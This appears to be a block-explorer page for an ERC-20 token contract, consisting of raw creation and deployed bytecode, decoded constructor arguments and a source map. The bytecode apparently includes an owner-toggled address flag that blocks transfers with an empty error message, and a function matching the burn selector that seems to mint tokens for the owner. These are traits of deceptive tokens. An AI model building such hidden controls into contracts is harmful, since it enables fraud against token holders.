fffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4e90611724565b60405180910390fd5b610f628383836113c5565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe090611724565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461107e91906117f6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e291906117a4565b60405180910390a36110f58484846113ca565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6111f0610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661120e6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614611264576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125b90611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156112d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112cb90611784565b60405180910390fd5b6112e0600083836113c5565b80600460008282546112f291906117f6565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461134891906117f6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113ad91906117a4565b60405180910390a36113c1600083836113ca565b5050565b505050565b505050565b6000813590506113de81611b55565b92915050565b6000813590506113f381611b6c565b92915050565b60006020828403121561140b57600080fd5b6000611419848285016113cf565b91505092915050565b6000806040838503121561143557600080fd5b6000611443858286016113cf565b9250506020611454858286016113cf565b9150509250929050565b60008060006060848603121561147357600080fd5b6000611481868287016113cf565b9350506020611492868287016113cf565b92505060406114a3868287016113e4565b9150509250925092565b600080604083850312156114c057600080fd5b60006114ce858286016113cf565b92505060206114df858286016113e4565b9150509250929050565b6114f28161185e565b82525050565b6000611503826117da565b61150d81856117e5565b935061151d8185602086016118a1565b61152681611964565b840191505092915050565b600061153e6026836117e5565b915061154982611975565b604082019050919050565b60006115616022836117e5565b915061156c826119c4565b604082019050919050565b60006115846028836117e5565b915061158f82611a13565b604082019050919050565b60006115a76020836117e5565b91506115b282611a62565b602082019050919050565b60006115ca6000836117e5565b91506115d582611a8b565b600082019050919050565b60006115ed6024836117e5565b91506115f882611a8e565b604082019050919050565b60006116106025836117e5565b915061161b82611add565b604082019050919050565b6000611633601f836117e5565b915061163e82611b2c565b602082019050919050565b6116528161188a565b82525050565b61166181611894565b82525050565b600060208201905061167c60008301846114e9565b92915050565b6000602082019050818103600083015261169c81846114f8565b905092915050565b600060208201905081810360008301526116bd81611531565b9050919050565b600060208201905081810360008301526116dd81611554565b9050919050565b600060208201905081810360008301526116fd81611577565b9050919050565b6000602082019050818103600083015261171d8161159a565b9050919050565b6000602082019050818103600083015261173d816115bd565b9050919050565b6000602082019050818103600083015261175d816115e0565b9050919050565b6000602082019050818103600083015261177d81611603565b9050919050565b6000602082019050818103600083015261179d81611626565b9050919050565b60006020820190506117b96000830184611649565b92915050565b60006020820190506117d46000830184611658565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118018261188a565b915061180c8361188a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561184157611840611906565b5b828201905092915050565b60006118578261186a565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118bf5780820151818401526020810190506118a4565b838111156118ce576000848401525b50505050565b600060028204905060018216806118ec57607f821691505b60208210811415611900576118ff611935565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b611b5e8161184c565b8114611b6957600080fd5b50565b611b758161188a565b8114611b8057600080fd5b5056fea2646970667358221220737e29c594173b249f02fc072ca02a6ecd4091946f028edadc6a90d2f3b2439e64736f6c63430008010033000000000000000000000000756bb95c79cf42c219d59725fa9fa1a84be01861000000000000000000000000000000000000000000000000016345785d8a0000000000000000000000000000000000000000000000000000016345785d8a0000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806395d89b41116100a2578063c0d611e511610071578063c0d611e5146102ce578063c71e6070146102ec578063dd62ed3e14610308578063f2fde38b14610338578063fef63a92146103545761010b565b806395d89b41146102345780639dc29fac14610252578063a457c2d71461026e578063a9059cbb1461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611682565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b6040516101559190611667565b60405180910390f35b610166610434565b60405161017391906117a4565b60405180910390f35b6101966004803603810190610191919061145e565b61043e565b6040516101a39190611667565b60405180910390f35b6101b4610536565b6040516101c191906117bf565b60405180910390f35b6101e460048036038101906101df91906114ad565b61054d565b6040516101f19190611667565b60405180910390f35b610214600480360381019061020f91906113f9565b6105f9565b60405161022191906117a4565b60405180910390f35b610232610642565b005b61023c6106ca565b6040516102499190611682565b60405180910390f35b61026c600480360381019061026791906114ad565b61075c565b005b610288600480360381019061028391906114ad565b61076a565b6040516102959190611667565b60405180910390f35b6102b860048036038101906102b391906114ad565b610855565b6040516102c59190611667565b60405180910390f35b6102d6610873565b6040516102e391906117a4565b60405180910390f35b610306600480360381019061030191906113f9565b61089b565b005b610322600480360381019061031d9190611422565b610a29565b60405161032f91906117a4565b60405180910390f35b610352600480360381019061034d91906113f9565b610ab0565b005b61036e600480360381019061036991906113f9565b610ba8565b60405161037b9190611667565b60405180910390f35b606060058054610393906118d4565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118d4565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610bfe565b8484610c06565b6001905092915050565b6000600454905090565b600061044b848484610dd1565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906116e4565b60405180910390fd5b61052a85610522610bfe565b858403610c06565b60019150509392505050565b6000600760009054906101000a900460ff16905090565b60006105ef61055a610bfe565b848460036000610568610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105ea91906117f6565b610c06565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61064a610bfe565b73ffffffffffffffffffffffffffffffffffffffff166106686110fb565b73ffffffffffffffffffffffffffffffffffffffff16146106be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106b590611704565b60405180910390fd5b6106c86000611124565b565b6060600680546106d9906118d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610705906118d4565b80156107525780601f1061072757610100808354040283529160200191610752565b820191906000526020600020905b81548152906001019060200180831161073557829003601f168201915b5050505050905090565b61076682826111e8565b5050565b60008060036000610779610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082d90611764565b60405180910390fd5b61084a610841610bfe565b85858403610c06565b600191505092915050565b6000610869610862610bfe565b8484610dd1565b6001905092915050565b60007f000000000000000000000000000000000000000000000000016345785d8a0000905090565b6108a3610bfe565b73ffffffffffffffffffffffffffffffffffffffff166108c16110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610917576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090e90611704565b60405180910390fd5b60001515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514156109cd576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610a26565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab8610bfe565b73ffffffffffffffffffffffffffffffffffffffff16610ad66110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610b2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2390611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906116a4565b60405180910390fd5b610ba581611124565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d90611744565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906116c4565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dc491906117a4565b60405180910390a3505050565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e725750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610ee757600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ee6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610edd90611724565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4e90611724565b60405180910390fd5b610f628383836113c5565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe090611724565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461107e91906117f6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e291906117a4565b60405180910390a36110f58484846113ca565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6111f0610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661120e6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614611264576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125b90611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156112d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112cb90611784565b60405180910390fd5b6112e0600083836113c5565b80600460008282546112f291906117f6565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461134891906117f6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113ad91906117a4565b60405180910390a36113c1600083836113ca565b5050565b505050565b505050565b6000813590506113de81611b55565b92915050565b6000813590506113f381611b6c565b92915050565b60006020828403121561140b57600080fd5b6000611419848285016113cf565b91505092915050565b6000806040838503121561143557600080fd5b6000611443858286016113cf565b9250506020611454858286016113cf565b9150509250929050565b60008060006060848603121561147357600080fd5b6000611481868287016113cf565b9350506020611492868287016113cf565b92505060406114a3868287016113e4565b9150509250925092565b600080604083850312156114c057600080fd5b60006114ce858286016113cf565b92505060206114df858286016113e4565b9150509250929050565b6114f28161185e565b82525050565b6000611503826117da565b61150d81856117e5565b935061151d8185602086016118a1565b61152681611964565b840191505092915050565b600061153e6026836117e5565b915061154982611975565b604082019050919050565b60006115616022836117e5565b915061156c826119c4565b604082019050919050565b60006115846028836117e5565b915061158f82611a13565b604082019050919050565b60006115a76020836117e5565b91506115b282611a62565b602082019050919050565b60006115ca6000836117e5565b91506115d582611a8b565b600082019050919050565b60006115ed6024836117e5565b91506115f882611a8e565b604082019050919050565b60006116106025836117e5565b915061161b82611add565b604082019050919050565b6000611633601f836117e5565b915061163e82611b2c565b602082019050919050565b6116528161188a565b82525050565b61166181611894565b82525050565b600060208201905061167c60008301846114e9565b92915050565b6000602082019050818103600083015261169c81846114f8565b905092915050565b600060208201905081810360008301526116bd81611531565b9050919050565b600060208201905081810360008301526116dd81611554565b9050919050565b600060208201905081810360008301526116fd81611577565b9050919050565b6000602082019050818103600083015261171d8161159a565b9050919050565b6000602082019050818103600083015261173d816115bd565b9050919050565b6000602082019050818103600083015261175d816115e0565b9050919050565b6000602082019050818103600083015261177d81611603565b9050919050565b6000602082019050818103600083015261179d81611626565b9050919050565b60006020820190506117b96000830184611649565b92915050565b60006020820190506117d46000830184611658565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118018261188a565b915061180c8361188a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561184157611840611906565b5b828201905092915050565b60006118578261186a565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118bf5780820151818401526020810190506118a4565b838111156118ce576000848401525b50505050565b600060028204905060018216806118ec57607f821691505b60208210811415611900576118ff611935565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b611b5e8161184c565b8114611b6957600080fd5b50565b611b758161188a565b8114611b8057600080fd5b5056fea2646970667358221220737e29c594173b249f02fc072ca02a6ecd4091946f028edadc6a90d2f3b2439e64736f6c63430008010033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000756bb95c79cf42c219d59725fa9fa1a84be01861000000000000000000000000000000000000000000000000016345785d8a0000000000000000000000000000000000000000000000000000016345785d8a0000

-----Decoded View---------------
Arg [0] : _premintOwner (address): 0x756Bb95C79Cf42c219d59725fA9Fa1a84Be01861
Arg [1] : _premintSupply (uint256): 100000000000000000
Arg [2] : _capLimit (uint256): 100000000000000000

-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 000000000000000000000000756bb95c79cf42c219d59725fa9fa1a84be01861
Arg [1] : 000000000000000000000000000000000000000000000000016345785d8a0000
Arg [2] : 000000000000000000000000000000000000000000000000016345785d8a0000


Deployed Bytecode Sourcemap

2056:1137:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2032:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4206:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3159:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4857:490;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2994:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6457:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3330:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2389:103:3;;;:::i;:::-;;2251:104:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3093:97:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7175:411:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3670:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2884:95:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5632:194:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3908:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2647:201:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5933:115:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2032:100;2086:13;2119:5;2112:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2032:100;:::o;4206:169::-;4289:4;4306:39;4315:12;:10;:12::i;:::-;4329:7;4338:6;4306:8;:39::i;:::-;4363:4;4356:11;;4206:169;;;;:::o;3159:108::-;3220:7;3247:12;;3240:19;;3159:108;:::o;4857:490::-;4997:4;5014:36;5024:6;5032:9;5043:6;5014:9;:36::i;:::-;5063:24;5090:11;:19;5102:6;5090:19;;;;;;;;;;;;;;;:33;5110:12;:10;:12::i;:::-;5090:33;;;;;;;;;;;;;;;;5063:60;;5162:6;5142:16;:26;;5134:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;5249:57;5258:6;5266:12;:10;:12::i;:::-;5299:6;5280:16;:25;5249:8;:57::i;:::-;5335:4;5328:11;;;4857:490;;;;;:::o;2994:100::-;3052:5;3077:9;;;;;;;;;;;3070:16;;2994:100;:::o;6457:215::-;6545:4;6562:80;6571:12;:10;:12::i;:::-;6585:7;6631:10;6594:11;:25;6606:12;:10;:12::i;:::-;6594:25;;;;;;;;;;;;;;;:34;6620:7;6594:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;6562:8;:80::i;:::-;6660:4;6653:11;;6457:215;;;;:::o;3330:127::-;3404:7;3431:9;:18;3441:7;3431:18;;;;;;;;;;;;;;;;3424:25;;3330:127;;;:::o;2389:103:3:-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2454:30:::1;2481:1;2454:18;:30::i;:::-;2389:103::o:0;2251:104:1:-;2307:13;2340:7;2333:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2251:104;:::o;3093:97:0:-;3160:22;3166:7;3175:6;3160:5;:22::i;:::-;3093:97;;:::o;7175:411:1:-;7268:4;7285:24;7312:11;:25;7324:12;:10;:12::i;:::-;7312:25;;;;;;;;;;;;;;;:34;7338:7;7312:34;;;;;;;;;;;;;;;;7285:61;;7385:15;7365:16;:35;;7357:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7478:67;7487:12;:10;:12::i;:::-;7501:7;7529:15;7510:16;:34;7478:8;:67::i;:::-;7574:4;7567:11;;;7175:411;;;;:::o;3670:175::-;3756:4;3773:42;3783:12;:10;:12::i;:::-;3797:9;3808:6;3773:9;:42::i;:::-;3833:4;3826:11;;3670:175;;;;:::o;2884:95:0:-;2933:7;2960:11;2953:18;;2884:95;:::o;5632:194:1:-;1969:12:3;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5731:5:1::1;5705:31;;:14;:22;5720:6;5705:22;;;;;;;;;;;;;;;;;;;;;;;;;:31;;;5692:127;;;5764:4;5739:14;:22;5754:6;5739:22;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;5692:127;;;5812:5;5787:14;:22;5802:6;5787:22;;;;;;;;;;;;;;;;:30;;;;;;;;;;;;;;;;;;5692:127;5632:194:::0;:::o;3908:151::-;3997:7;4024:11;:18;4036:5;4024:18;;;;;;;;;;;;;;;:27;4043:7;4024:27;;;;;;;;;;;;;;;;4017:34;;3908:151;;;;:::o;2647:201:3:-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2756:1:::1;2736:22;;:8;:22;;;;2728:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2812:28;2831:8;2812:18;:28::i;:::-;2647:201:::0;:::o;5933:115:1:-;5994:4;6018:14;:22;6033:6;6018:22;;;;;;;;;;;;;;;;;;;;;;;;;6011:29;;5933:115;;;:::o;603:98:3:-;656:7;683:10;676:17;;603:98;:::o;10582:344:1:-;10701:1;10684:19;;:5;:19;;;;10676:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10782:1;10763:21;;:7;:21;;;;10755:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10864:6;10834:11;:18;10846:5;10834:18;;;;;;;;;;;;;;;:27;10853:7;10834:27;;;;;;;;;;;;;;;:36;;;;10902:7;10886:32;;10895:5;10886:32;;;10911:6;10886:32;;;;;;:::i;:::-;;;;;;;;10582:344;;;:::o;8076:697::-;8211:14;:22;8226:6;8211:22;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;8237:14;:25;8252:9;8237:25;;;;;;;;;;;;;;;;;;;;;;;;;8211:51;8198:108;;;8299:1;8281:20;;:6;:20;;;8273:33;;;;;;;;;;;;:::i;:::-;;;;;;;;;8198:108;8346:1;8325:23;;:9;:23;;;;8317:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;8375:47;8396:6;8404:9;8415:6;8375:20;:47::i;:::-;8435:21;8459:9;:17;8469:6;8459:17;;;;;;;;;;;;;;;;8435:41;;8512:6;8495:13;:23;;8487:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;8595:6;8579:13;:22;8559:9;:17;8569:6;8559:17;;;;;;;;;;;;;;;:42;;;;8647:6;8623:9;:20;8633:9;8623:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;8688:9;8671:35;;8680:6;8671:35;;;8699:6;8671:35;;;;;;:::i;:::-;;;;;;;;8719:46;8739:6;8747:9;8758:6;8719:19;:46::i;:::-;8076:697;;;;:::o;1736:89:3:-;1784:7;1811:6;;;;;;;;;;;1804:13;;1736:89;:::o;3008:191::-;3082:16;3101:6;;;;;;;;;;;3082:25;;3127:8;3118:6;;:17;;;;;;;;;;;;;;;;;;3182:8;3151:40;;3172:8;3151:40;;;;;;;;;;;;3008:191;;:::o;9731:409:1:-;1969:12:3;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9844:1:1::1;9825:21;;:7;:21;;;;9817:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;9895:49;9924:1;9928:7;9937:6;9895:20;:49::i;:::-;9973:6;9957:12;;:22;;;;;;;:::i;:::-;;;;;;;;10012:6;9990:9;:18;10000:7;9990:18;;;;;;;;;;;;;;;;:28;;;;;;;:::i;:::-;;;;;;;;10055:7;10034:37;;10051:1;10034:37;;;10064:6;10034:37;;;;;;:::i;:::-;;;;;;;;10084:48;10112:1;10116:7;10125:6;10084:19;:48::i;:::-;9731:409:::0;;:::o;11526:125::-;;;;:::o;12255:124::-;;;;:::o;7:139:4:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:109::-;2030:21;2045:5;2030:21;:::i;:::-;2025:3;2018:34;2008:50;;:::o;2064:364::-;;2180:39;2213:5;2180:39;:::i;:::-;2235:71;2299:6;2294:3;2235:71;:::i;:::-;2228:78;;2315:52;2360:6;2355:3;2348:4;2341:5;2337:16;2315:52;:::i;:::-;2392:29;2414:6;2392:29;:::i;:::-;2387:3;2383:39;2376:46;;2156:272;;;;;:::o;2434:366::-;;2597:67;